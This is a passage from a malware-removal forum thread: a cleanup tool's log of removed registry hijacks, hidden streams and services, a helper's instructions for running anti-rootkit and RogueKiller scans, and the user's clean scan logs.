"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savcleanup.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savcli.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savmain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savprogress.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBAMSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBAMTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SBPIMSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SCANNER.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SCANWSCS.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scfmanager.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scfservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\schedulerdaemon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\scproxysrv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ScSecSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevcon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevconIA.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcdevconx.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdcservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDFSSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sdtrayapp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SDWelcome.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\siteadv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sndsrvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Sniffer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\snsmcon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\snsupd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SoftAct.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spfirewallsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sppfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spybotsd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SpyHunter3.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spywareterminatorshield.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spywat~1.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sp_rsser.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ssupdate.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SSUpdate64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SUPERAntiSpyware.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SUPERDelete.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Taskmgr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Tcpdump.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\terminet.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Tethereal.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\text2pcap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\THGuard.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tppfdmn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TRAYICOS.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TRAYSSER.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\trigger.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tscutynt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\tzpfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiSeAgnt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiUpdateTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiWatchDog.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiWinMgr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\umxagent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\umxtray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UnThreat.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\updclient.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UserAccountControlSettings.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\utsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\UUpd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uwcdsvr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Main.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Medic.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Proxy.ahn" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3SP.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Svc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\V3Up.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VCATCH.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\vdtask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VIEWTCP.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VIPREUI.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\virusutilities.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\VSDesktop.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\WebCompanion.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\webwall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Windump.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winroute.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wireshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wwasher.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\xauth_service.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\xfilter.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Zanda.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zerospywarele.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zerospywarelite_installer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Zlh.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zlhh.exe" => key removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
Winsock: Catalog5 000000000003\\LibraryPath => restored successfully (%SystemRoot%\system32\NLAapi.dll)
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000004" => key removed successfully
Winsock: Catalog5-x64 000000000001\\LibraryPath => restored successfully (%SystemRoot%\system32\NLAapi.dll)

========= netsh winsock reset =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => key removed successfully
HKCR\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully
HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => key not found.
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value removed successfully
HKCR\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found.
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js => moved successfully
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js => not found.
C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp => moved successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
alz4j5u7 => service removed successfully
catchme => service removed successfully
cpuz130 => service removed successfully
NVIDIAHWAccess => service removed successfully
nvlddmkm => service removed successfully
Synth3dVsc => service removed successfully
tsusbhub => service removed successfully
usbbus => service removed successfully
UsbDiag => service removed successfully
USBModem => service removed successfully
VGPU => service removed successfully
C:\ProgramData\tP5544K4.dat => moved successfully
C:\Users\Kevin\AppData\Local\Temp\svchost.exe => moved successfully
"C:\Windows\system64" => Deleting reparse point and unlocking started:
"C:\Windows\system64" =>Deleting reparse point and unlocking completed.
"C:\Windows\system64" =>Deleting reparse point and unlocking completed.
C:\Program Files\Common Files\Microsoft Shared => ":9JWpxEmW4v11qmJOqJ7pjYs" ADS removed successfully.
C:\ProgramData\Microsoft => ":cyqnzX4eKYNTzpFQUfDk" ADS removed successfully.
C:\ProgramData\Microsoft => ":okPhkWKR99NHqk9eugRi0qqcLPl" ADS removed successfully.
C:\ProgramData\TEMP => ":33384BC0" ADS removed successfully.
C:\ProgramData\TEMP => ":3A6BC948" ADS removed successfully.
C:\ProgramData\TEMP => ":89C2A42C" ADS removed successfully.
C:\ProgramData\TEMP => ":91486201" ADS removed successfully.
C:\ProgramData\TEMP => ":D2A5A561" ADS removed successfully.
C:\ProgramData\TEMP => ":DED17083" ADS removed successfully.
"HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile" => key removed successfully
================== Zip: ===================
C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4 -> copied successfully to C:\Users\Kevin\Desktop\Upload.zip
C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m -> copied successfully to C:\Users\Kevin\Desktop\Upload.zip
"C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt" -> not found
"C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt" -> not found
=========== Zip: End ===========

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 24360266 B
Java, Flash, Steam htmlcache => 392983088 B
Windows/system/drivers => 52994174 B
Edge => 0 B
Chrome => 114688 B
Firefox => 151663617 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 17898255 B
systemprofile32 => 3235585 B
LocalService => 132244 B
NetworkService => 66228 B
Kevin => 18155296 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 639 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 07:44:37 ====


Edited by jumpman17, 21 October 2016 - 07:11 AM.


#6 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 23 October 2016 - 12:55 AM

Hi Jumpman17

 

It's good that you've changed your banking password. I also highly recommend you change your primary email password and your PayPal password, particularly if they are saved within your browser.  A lot of financial damage can be done with these.

 

malwarebytes_icon_mini_by_linux_rules-d9  Download 51a5f31352b88-icon_MBAR.pngMalwarebytes Anti-Rootkit (MBAR) to your desktop.

  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder located on your Desktop and paste the content of the following files in your next reply:
  • "mbar-log-{date} (xx-xx-xx).txt"
  • "system-log.txt"

mlEX1wH.png RogueKiller Scan

  • Please download and install RogueKiller (x64).
  • Close any running programmes.
  • Double-click RogueKillerx64.exe to run the programme.
  • Follow the prompts. If a browser window opens, close the window.
  • In the HOME tab, click Start Scan.
  • Upon completion, a browser window may open. Close this window. 
  • Do not have RogueKiller remove any detected items.
  • Click the HISTORY tab, followed by Scan Reports.
  • Double-click the scan log. Click Open TXT.
  • A Notepad file will open. Please copy the contents of the log and paste in your next reply.

Please include in your reply.

  • MBAR logs
  • RogueKiller log

TsVk!



#7 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 23 October 2016 - 06:03 AM

Thanks, I'll make sure to change my email passwords as well. I don't have a PayPal though, so no worries there. Here are the requested logs.

 

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.23.01
  rootkit: v2016.09.26.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18349
Kevin :: KEVIN-PC [administrator]

10/23/2016 2:00:22 AM
mbar-log-2016-10-23 (02-00-22).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Kernel memory modifications detected. Deep Anti-Rootkit Scan engaged.
Objects scanned: 365742
Time elapsed: 16 minute(s), 46 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Rootkit BETA 1.09.3.1001

© Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x64

Account is Administrative

Internet Explorer version: 11.0.9600.18349

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, E:\ DRIVE_FIXED, Z:\ DRIVE_FIXED
CPU speed: 3.392000 GHz
Memory total: 4194402304, free: 1792401408

Downloaded database version: v2016.10.23.01
Downloaded database version: v2016.09.26.02
Downloaded database version: v2016.09.21.01
=======================================
Initializing...
------------ Kernel report ------------
     10/23/2016 02:00:14
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\iolsmbcf.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\System32\Drivers\spqe.sys
\SystemRoot\System32\Drivers\WMILIB.SYS
\SystemRoot\System32\Drivers\SCSIPORT.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\DRIVERS\iusb3hcs.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\system32\drivers\pciide.sys
\SystemRoot\system32\drivers\PCIIDEX.SYS
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\drivers\vmbus.sys
\SystemRoot\system32\drivers\winhv.sys
\SystemRoot\system32\drivers\atapi.sys
\SystemRoot\system32\drivers\ataport.SYS
\SystemRoot\system32\drivers\nvstor.sys
\SystemRoot\system32\drivers\storport.sys
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\PxHlpa64.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\vmstorfl.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\ws2ifsl.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\vwififlt.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\drivers\mssmbios.sys
\SystemRoot\System32\Drivers\ElbyCDIO.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\system32\drivers\csc.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\system32\DRIVERS\igdkmd64.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\iusb3xhc.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\HECIx64.sys
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\rtwlane.sys
\SystemRoot\system32\DRIVERS\vwifibus.sys
\SystemRoot\system32\DRIVERS\Rt64win7.sys
\SystemRoot\System32\Drivers\AnyDVD.sys
\SystemRoot\system32\DRIVERS\GEARAspiWDM.sys
\SystemRoot\System32\Drivers\ab2n855s.SYS
\SystemRoot\system32\DRIVERS\intelppm.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\drivers\CompositeBus.sys
\SystemRoot\system32\DRIVERS\mv2.sys
\SystemRoot\system32\DRIVERS\RemotePCmirror.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\rdpbus.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\system32\DRIVERS\iusb3hub.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\drivers\usbscan.sys
\SystemRoot\system32\DRIVERS\usbprint.sys
\SystemRoot\system32\DRIVERS\dot4usb.sys
\SystemRoot\system32\DRIVERS\Dot4.sys
\SystemRoot\system32\drivers\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\Dot4Prt.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_dumpata.sys
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\system32\DRIVERS\LEqdUsb.Sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\LHidEqd.Sys
\SystemRoot\system32\DRIVERS\LHidFilt.Sys
\SystemRoot\system32\DRIVERS\LMouFilt.Sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\drivers\luafv.sys
\??\C:\Windows\system32\drivers\mbam.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\System32\Drivers\adfs.SYS
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\DRIVERS\asyncmac.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\system32\DRIVERS\WUDFRd.sys
\SystemRoot\System32\Drivers\fastfat.SYS
\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
----------- End -----------
Done!
IRP handler 0 of \Driver\USBSTOR points to an unknown module
Unhooking enabled.

Scan started
Database versions:
  main:    v2016.10.23.01
  rootkit: v2016.09.26.02

<<<1>>>
Upper Device Name: \Device\Harddisk3\DR3
Upper Device Object: 0xfffffa800638b060
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\000000aa\
Lower Device Object: 0xfffffa80063801f0
Lower Device Driver Name: \Driver\USBSTOR\
Device already Exists: 0xfffffa8006aa3360
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR2
Upper Device Object: 0xfffffa8006248790
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\0000008a\
Lower Device Object: 0xfffffa8004e876f0
Lower Device Driver Name: \Driver\USBSTOR\
Device already Exists: 0xfffffa8003d306c0
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR1
Upper Device Object: 0xfffffa80048ce620
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP1T0L0-1\
Lower Device Object: 0xfffffa80046a7060
Lower Device Driver Name: \Driver\atapi\
Device already Exists: 0xfffffa8006e63a50
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xfffffa800487e410
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP0T0L0-0\
Lower Device Object: 0xfffffa80046a0480
Lower Device Driver Name: \Driver\atapi\
Device already Exists: 0xfffffa80065b7240
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa800487e410, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa80048ce040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa800487e410, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80046a0260, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80046a0480, DeviceName: \Device\Ide\IdeDeviceP0T0L0-0\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0xfffff8a003691790, 0xfffffa800487e410, 0xfffffa80049b1390
Lower DeviceData: 0xfffff8a0059a1470, 0xfffffa80046a0480, 0xfffffa80065b7240
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
File user open failed: C:\WINDOWS\SYSTEM32\drivers\sptd.sys (0x00000020)
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 1BC070FA

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 204800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848  Numsec = 976560272
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 500107862016 bytes
Sector size: 512 bytes

Done!
